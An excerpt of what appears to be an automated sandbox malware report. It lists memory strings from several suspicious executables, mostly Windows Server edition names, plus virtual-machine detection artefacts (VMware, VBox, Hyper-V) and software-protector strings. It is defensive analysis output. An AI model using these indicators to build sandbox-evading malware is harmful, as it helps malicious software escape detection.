Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: ~VirtualMachineTypes
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: 8NjcvPNvUr.exe, 00000000.00000002.1687078940.000000000044B000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1712195825.000000000050B000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1715924134.000000000050B000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000007.00000002.2920362161.000000000050B000.00000040.00000001.01000000.00000007.sdmp, RoamingHJDBKJKFIE.exe, 0000000F.00000002.2581280707.0000000000E2B000.00000040.00000001.01000000.0000000D.sdmp, userKFHCAEGCBF.exe, 00000012.00000002.2598761608.0000000000DF9000.00000040.00000001.01000000.0000000E.sdmp, axplong.exe, 00000013.00000002.2624518320.0000000000349000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: 8ec8c5c339.exe, 0000000A.00000002.2721807225.00000000025D0000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareF
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2926586035.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002639000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2643663526.000001F41410A000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.000000000272E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: firefox.exe, 00000018.00000002.2629600629.00000238F2FB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645210207.000001F414514000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 8ec8c5c339.exe, 00000008.00000002.2740205336.000000000249E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareJ
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: 8ec8c5c339.exe, 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: userKFHCAEGCBF.exe, 00000012.00000003.2567537123.000000000169B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: xVBoxService.exe
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
